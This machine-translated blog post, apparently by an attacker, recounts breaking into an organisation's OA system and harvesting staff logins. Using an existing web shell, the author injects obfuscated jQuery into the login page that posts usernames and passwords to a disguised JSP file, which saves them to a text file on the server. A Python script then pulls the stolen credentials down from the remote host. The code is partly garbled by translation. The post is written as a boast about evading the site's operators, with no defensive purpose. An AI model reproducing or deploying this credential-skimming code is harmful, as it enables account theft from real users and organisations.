Write a phishing page to get the website's OA system account

Write a phishing page to get the website's OA system account

I found the storage type XSS before, but found that the session is actually http-only. Well, the cooking skill is not enough and cannot be obtained.

So I came up with this kind of damage...

0x1 step

If you are using phishing, do you have to place traps? So I found the most convenient and direct place! Login page...

View the source code and find that this location can capture the plaintext. The js here is used to check whether the submitted account and password meet the requirements. We can insert the phishing js above return true;

0x2 Manufacturing traps

What are you waiting for since you have found a proper location? Write code!

I found that jQuery was used in this OA system. haha that post is much more convenient. What is a saying? Killing with a knife? ...

// JavaScript code, embedded in the login page

$. Post ("webmag/footer2.jsp ",
{
User: $ ("# loginName"). val (),
Pass: $ ("# password"). val ()
});

// Encrypted version

Eval (function (p, a, c, k, e, r) {e = String; if (! ''. Replace (/^/, String) {while (c --) r [c] = k [c] | c; k = [function (e) {return r [e]}]; e = function () {return '\ w +'}; c = 1}; while (c --) if (k [c]) p = p. replace (new RegExp ('\ B' + e (c) + '\ B', 'G'), k [c]); return p} ('$. 1 ("2.3", {4: $("#5 "). 0 (), 6: $("#7 "). 0 ()}); ', 8, 8, 'val | post | footer2 | jsp | user | loginName | pass | password '. split ('|'), 0 ,{}))
 

Then the JSP code

// Footer2.jsp code, used to save the account password <% @ page contentType = "text/html; charset = UTF-8 "%> <% @ page language =" java "%> <% @ page import =" java. io. * "%> <% String p_user = request. getParameter ("user"); String p_pass = request. getParameter ("pass"); if (p_user! = "Null") {String path = request. getRealPath ("/") + "\ webmag \ tutor \ tutor.txt"; File file = new File (path); FileWriter fw = new FileWriter (file, true ); bufferedWriter bw = new BufferedWriter (fw); bw. write (p_user + "|" + p_pass + "\ n"); bw. close (); fw. close () ;}%>

 

0x3 upload test

I got the shell and used the kitchen knife to upload the New Login homepage and footer2.jsp. (I can't think of a better name to disguise this jsp file ..)
In a short time, the fish hooked up and accidentally got the admin password...

0x4 backup, backup, backup! (Three important things !)

On the server, there will be one day deleted by O & M sooner or later, so I offered python to save and get the account password!

// Python code, used to collect the recent account and password from the remote server #-*-coding: UTF-8-*-# Support Python2import urllib2print 'getting mails now 'data = urllib2.urlopen ('HTTP: // www.xxxxxx.com/xxxxx/webmag/tutor/tutor.txt') result = data. read () with open('mail.txt ', 'w') as f: f. write (result) print 'OK, enjoy it :)'

In the test, both the mobile phone and Raspberry Pi can be successfully executed ~

0x5 Summary

This Coding is not smooth, because it won't be jsp. Baidu has been splicing the code for a long time, and then wrote footer2.jsp code based on its php experience.

I hope O & M will not find that I have tampered with the homepage... Although the encrypted js code is used, it is not very reassuring :(

In any case, this is a successful fishing!